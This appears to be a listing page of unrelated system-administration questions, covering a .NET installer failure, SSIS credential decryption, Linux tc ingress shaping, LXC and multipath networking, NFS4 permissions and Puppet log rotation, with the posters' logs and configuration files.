    Hi, When I install the .net Framework 3.5 SP1 on my rental VPS, I get the message that setup has failed. It's a Server 2003 VPS w/ SP2 installed (64-bit). The .net Framework v 2.0 installed correctly. How do I fix this? This is the installation log: [03/10/10,07:44:46] Microsoft .NET Framework 2.0a x64: [2] Failed to fetch setup file in CBaseComponent::PreInstall() [03/10/10,07:44:47] setup.exe: [2] ISetupComponent::Pre/Post/Install() failed in ISetupManager::InternalInstallManager() with HRESULT -2147467260. [03/10/10,07:44:48] setup.exe: [2] CSetupManager::RunInstallPhase() - Call to Pre/Install/Post for InstallComponents failed [03/10/10,07:44:49] setup.exe: [2] CSetupManager::RunInstallPhaseAndCheckResults() - RunInstallPhase() returned a NULL piActionResults [03/10/10,07:44:49] setup.exe: [2] CSetupManager::RunInstallFromList() - RunInstallPhaseAndCheckResults failed [2] [03/10/10,07:44:51] setup.exe: [2] ISetupManager::RunInstallLists(IP_PREINSTALL failed in ISetupManager::RunInstallFromThread() [03/10/10,07:44:52] setup.exe: [2] ISetupManager::RunInstallFromThread() failed in ISetupManager::RunInstall() [03/10/10,07:44:53] setup.exe: [2] CSetupManager::Run() - Call to RunInstall() failed [03/10/10,07:44:59] WapUI: [2] DepCheck indicates Microsoft .NET Framework 2.0a x64 is not installed. [03/10/10,07:45:00] WapUI: [2] DepCheck indicates XPSEPSC x64 Installer was not attempted to be installed. [03/10/10,07:45:02] WapUI: [2] DepCheck indicates Microsoft .NET Framework 3.0 SP2 x64 was not attempted to be installed. [03/10/10,07:45:02] WapUI: [2] DepCheck indicates Microsoft .NET Framework 3.5 (x64) 'package' was not attempted to be installed. [03/11/10,14:19:23] Microsoft .NET Framework 3.0 SP2 x64: [2] Error: Installation failed for component Microsoft .NET Framework 3.0 SP2 x64. MSI returned error code 1604 [03/11/10,14:26:14] WapUI: [2] DepCheck indicates Microsoft .NET Framework 3.0 SP2 x64 is not installed. Thanks!! Yvan

    Read the article

  • MS SQL - Problem running SQL Server Agent Job via service account credentials

    - by molecule
    There are 5 steps in this job. First job is an SSIS Package store, second to fifth are file system jobs. We configured all jobs to use Windows Authentication. Under Run As, we specified a user account which was created under SecurityCredentials and SQL Server AgentProxiesSSIS Package execution. The job runs without any problems with this user account. We then proceeded to configure the job to use a service account instead. Service account was specified under SecurityCredentials and SQL Server AgentProxiesSSIS Package Execution. The job fails with this error. Executed as user: domain\serviceaccount. ....00 for 32-bit Copyright (C) Microsoft Corp 1984-2005. All rights reserved. Started: 3:37:57 PM Error: 2010-03-09 15:37:57.95 Code: 0xC0016016 Source: Description: Failed to decrypt protected XML node "DTS:Password" with error 0x8009000B "Key not valid for use in specified state.". You may not be authorized to access this information. This error occurs when there is a cryptographic error. Verify that the correct key is available. End Error Error: 2010-03-09 15:38:01.19 Code: 0xC0047062 Source: Get CONT_VIEW_LADDER in latest 45days OracleFMDatabase [1] Description: System.Data.OracleClient.OracleException: ORA-01005: null password given; logon denied at System.Data.OracleClient.OracleException.Check(OciErrorHandle errorHandle, Int32 rc) at System.Data.OracleClient.OracleInternalConnection.OpenOnLocalTransaction(String userName, String password, String serverName, Boo... The package execution fa... The step failed. Based on some research, I then go into MS Visual Studio and Open the project. I change the property of the package security from "EncryptSensitiveWithUserKey" to "DontSaveSensitive" but i still get the above error. I am new to this so any help will be very much appreciated. Thanks in advance

    Read the article

  • Ingress filtering in Linux traffic control: Redirect traffic to IFB device

    - by Dani Camps
    I have an openwrt router and I want to shape incoming traffic in order to classify all the traffic addressed to a certain IP address in my home network as low priority. For that purpose I want to redirect all traffic incoming to the eth1 interface, the one connected to the DSL modem, to an IFB device where I will do the shaping. These are the details of my system: Linux OpenWrt 2.6.32.27 #7 Fri Jul 15 02:43:34 CEST 2011 mips GNU/Linux Here is the script I am using where the last instruction is failing: # Variable definition ETH=eth1 IFB=ifb1 IP_LP="192.168.1.22/32" DL_RATE="900kbps" HP_RATE="890kbps" LP_RATE="10kbps" TC="tc" # Configuring the ifbX interface insmod ifb insmod sch_htb insmod sch_ingress ifconfig $IFB up # Adding the HTB scheduler to the ingress interface $TC qdisc add dev $IFB root handle 1: htb default 11 # Set the maximum bandwidth that each priority class can get, and the maximum borrowing they can do $TC class add dev $IFB parent 1:1 classid 1:10 htb rate $LP_RATE ceil $DL_RATE $TC class add dev $IFB parent 1:1 classid 1:11 htb rate $HP_RATE ceil $DL_RATE # Redirect all ingress traffic arriving at $ETH to $IFB $TC qdisc del dev $ETH ingress 2>/dev/null $TC qdisc add dev $ETH ingress $TC filter add dev $ETH parent ffff: protocol ip prio 1 u32 \ match u32 0 0 flowid 1:1 \ action mirred egress redirect dev $IFB The last instruction fails with: Action 4 device ifb1 ifindex 9 RTNETLINK answers: No such file or directory We have an error talking to the kernel Does anyone know what am I doing wrong ? Best Regards Daniel

    Read the article

  • When I restart my virtual enviorment it does not re-bind to the IP address

    - by RoboTamer
    The IP does no longer respond to a remote ping With restart I mean: lxc-stop -n vm3 lxc-start -n vm3 -f /etc/lxc/vm3.conf -d -- /etc/network/interfaces auto lo iface lo inet loopback up route add -net 127.0.0.0 netmask 255.0.0.0 dev lo down route add -net 127.0.0.0 netmask 255.0.0.0 dev lo # device: eth0 auto eth0 iface eth0 inet manual auto br0 iface br0 inet static address 192.22.189.58 netmask 255.255.255.248 gateway 192.22.189.57 broadcast 192.22.189.63 bridge_ports eth0 bridge_fd 0 bridge_hello 2 bridge_maxage 12 bridge_stp off post-up ip route add 192.22.189.59 dev br0 post-up ip route add 192.22.189.60 dev br0 post-up ip route add 192.22.189.61 dev br0 post-up ip route add 192.22.189.62 dev br0 -- /etc/lxc/vm3.conf lxc.utsname = vm3 lxc.rootfs = /var/lib/lxc/vm3/rootfs lxc.tty = 4 #lxc.pts = 1024 # pseudo tty instance for strict isolation lxc.network.type = veth lxc.network.flags = up lxc.network.link = br0 lxc.network.name = eth0 lxc.network.mtu = 1500 #lxc.cgroup.cpuset.cpus = 0 # security parameter lxc.cgroup.devices.deny = a # Deny all access to devices lxc.cgroup.devices.allow = c 1:3 rwm # dev/null lxc.cgroup.devices.allow = c 1:5 rwm # dev/zero lxc.cgroup.devices.allow = c 5:1 rwm # dev/console lxc.cgroup.devices.allow = c 5:0 rwm # dev/tty lxc.cgroup.devices.allow = c 4:0 rwm # dev/tty0 lxc.cgroup.devices.allow = c 4:1 rwm # dev/tty1 lxc.cgroup.devices.allow = c 4:2 rwm # dev/tty2 lxc.cgroup.devices.allow = c 1:9 rwm # dev/urandon lxc.cgroup.devices.allow = c 1:8 rwm # dev/random lxc.cgroup.devices.allow = c 136:* rwm # dev/pts/* lxc.cgroup.devices.allow = c 5:2 rwm # dev/pts/ptmx lxc.cgroup.devices.allow = c 254:0 rwm # rtc # mounts point lxc.mount.entry=proc /var/lib/lxc/vm3/rootfs/proc proc nodev,noexec,nosuid 0 0 lxc.mount.entry=devpts /var/lib/lxc/vm3/rootfs/dev/pts devpts defaults 0 0 lxc.mount.entry=sysfs /var/lib/lxc/vm3/rootfs/sys sysfs defaults 0 0

    Read the article

  • Howo to get Multipath IO with Dell MD3600i into active/active setup?

    - by Disco
    I'm desperately trying to improve performance of my SAN connection. Here's what i have: [root@xnode1 dell]# multipath -ll mpath1 (36d4ae520009bd7cc0000030e4fe8230b) dm-2 DELL,MD36xxi [size=5.5T][features=3 queue_if_no_path pg_init_retries 50][hwhandler=1 rdac][rw] \_ round-robin 0 [prio=200][active] \_ 18:0:0:0 sdb 8:16 [active][ready] \_ 19:0:0:0 sdd 8:48 [active][ghost] \_ 20:0:0:0 sdf 8:80 [active][ghost] \_ 21:0:0:0 sdh 8:112 [active][ready] And multipath.conf : defaults { udev_dir /dev polling_interval 5 prio_callout none rr_min_io 100 max_fds 8192 user_friendly_names yes path_grouping_policy multibus default_features "1 fail_if_no_path" } blacklist { device { vendor "*" product "Universal Xport" } } devices { device { vendor "DELL" product "MD36xxi" path_checker rdac path_selector "round-robin 0" hardware_handler "1 rdac" failback immediate features "2 pg_init_retries 50" no_path_retry 30 rr_min_io 100 prio_callout "/sbin/mpath_prio_rdac /dev/%n" } } And sessions. [root@xnode1 dell]# iscsiadm -m session tcp: [13] 10.0.51.220:3260,1 iqn.1984-05.com.dell:powervault.md3600i.6d4ae520009bd7cc000000004fd7507c tcp: [14] 10.0.50.221:3260,2 iqn.1984-05.com.dell:powervault.md3600i.6d4ae520009bd7cc000000004fd7507c tcp: [15] 10.0.51.221:3260,2 iqn.1984-05.com.dell:powervault.md3600i.6d4ae520009bd7cc000000004fd7507c tcp: [16] 10.0.50.220:3260,1 iqn.1984-05.com.dell:powervault.md3600i.6d4ae520009bd7cc000000004fd7507c I'm getting very poor read performance : dd if=/dev/mapper/mpath1 of=/dev/null bs=1M count=1000 The SAN is configured as follows: CTRL0,PORT0 : 10.0.50.220 CTRL0,PORT1 : 10.0.50.221 CTRL1,PORT0 : 10.0.51.220 CTRL1,PORT1 : 10.0.51.221 And on the host : IF0 : 10.0.50.1 IF1 : 10.0.51.1 (Dual 10GbE Ethernet Card Intel DA2) It's connected to a 10gbE switch dedicated for SAN traffic. My questions being; why the connection is set up as 'ghost' and not 'ready' like an active/active configuration ?

    Read the article

  • NFS4 permission denied when userid does not match (even though idmap is working)

    - by SystemParadox
    I have NFS4 setup with idmapd working correctly. ls -l from the client shows the correct user names, even though the user ids differ between the machines. However, when the user ids do not match, I get 'permission denied' errors trying access files, even though ls -l shows the correct username. When the user ids do happen to match by coincidence, everything works fine. sudo sysctl -w sunrpc.nfsd_debug=1023 gives the following output in the server syslog for the failed file access: nfsd_dispatch: vers 4 proc 1 nfsv4 compound op #1/3: 22 (OP_PUTFH) nfsd: fh_verify(28: 00070001 015c0001 00000000 9853d400 2a4892a5 4918a0ba) nfsv4 compound op ffff88003d0f5078 opcnt 3 #1: 22: status 0 nfsv4 compound op #2/3: 3 (OP_ACCESS) nfsd: fh_verify(28: 00070001 015c0001 00000000 9853d400 2a4892a5 4918a0ba) nfsd: fh_verify - just checking nfsv4 compound op ffff88003d0f5078 opcnt 3 #2: 3: status 0 nfsv4 compound op #3/3: 9 (OP_GETATTR) nfsd: fh_verify(28: 00070001 015c0001 00000000 9853d400 2a4892a5 4918a0ba) nfsd: fh_verify - just checking nfsv4 compound op ffff88003d0f5078 opcnt 3 #3: 9: status 0 nfsv4 compound returned 0 nfsd_dispatch: vers 4 proc 1 nfsv4 compound op #1/7: 22 (OP_PUTFH) nfsd: fh_verify(28: 00070001 015c0001 00000000 9853d400 2a4892a5 4918a0ba) nfsv4 compound op ffff88003d0f5078 opcnt 7 #1: 22: status 0 nfsv4 compound op #2/7: 32 (OP_SAVEFH) nfsv4 compound op ffff88003d0f5078 opcnt 7 #2: 32: status 0 nfsv4 compound op #3/7: 18 (OP_OPEN) NFSD: nfsd4_open filename dom_file op_stateowner (null) renewing client (clientid 4f96587d/0000000e) nfsd: nfsd_lookup(fh 28: 00070001 015c0001 00000000 9853d400 2a4892a5 4918a0ba, dom_file) nfsd: fh_verify(28: 00070001 015c0001 00000000 9853d400 2a4892a5 4918a0ba) nfsd: fh_verify - just checking nfsd: fh_lock(28: 00070001 015c0001 00000000 9853d400 2a4892a5 4918a0ba) locked = 0 nfsd: fh_compose(exp 08:01/22806529 srv/dom_file, ino=22809724) nfsd: fh_verify(36: 01070001 015c0001 00000000 9853d400 2a4892a5 4918a0ba) nfsd: fh_verify - just checking fh_verify: srv/dom_file permission failure, acc=804, error=13 nfsv4 compound op ffff88003d0f5078 opcnt 7 #3: 18: status 13 nfsv4 compound returned 13 Is that useful to anyone? Any hints on to debug this would be greatly appreciated. Server kernel: 2.6.32-40-server (Ubuntu 10.04) Client kernel: 3.2.0-27-generic (Ubuntu 12.04) Same problem with my new server running 3.2.0-27-generic (Ubuntu 12.04). Thanks.

    Read the article

  • What causes this logrotate behavior in Puppet?

    - by ujjain
    After running logrotate, Puppet starts writing it's logs into /var/log/puppet/masterhttp.log-20130616. How come it doesn't keep logging in /var/log/puppet/masterhttp.log? It seems normal behavior is renaming the original log-file and start with a clean fresh log-file to start writing in that log file, keeping the other file as a log-archive. [root@puppetmaster puppet]# ls -al total 97520 drwxr-x---. 2 puppet puppet 4096 Jun 16 03:24 . drwxr-xr-x. 12 root root 4096 Jul 1 09:11 .. -rw-r--r--. 1 puppet puppet 0 Jun 16 03:24 masterhttp.log -rw-rw----. 1 puppet puppet 99847187 Jul 1 09:19 masterhttp.log-20130616 [root@puppetmaster init.d]# cat /etc/logrotate.d/puppet /var/log/puppet/*log { missingok notifempty create 0644 puppet puppet sharedscripts postrotate pkill -USR2 -u puppet -f /usr/sbin/puppetmasterd || true [ -e /etc/init.d/puppet ] && /etc/init.d/puppet reload > /dev/null 2>&1 || true endscript } [root@puppetmaster init.d]# How can I make Puppet log to /var/log/puppet/masterhttp.log and not to /var/log/puppet/masterhttp.log-20130616? Even restarting puppet doesn't make it log into /var/log/puppet/masterhttp.log instead of /var/log/puppet/masterhttp.log-20130616.

    Read the article

< Previous Page | 532 533 534 535 536 537 538 539 540 541 542 543  | Next Page >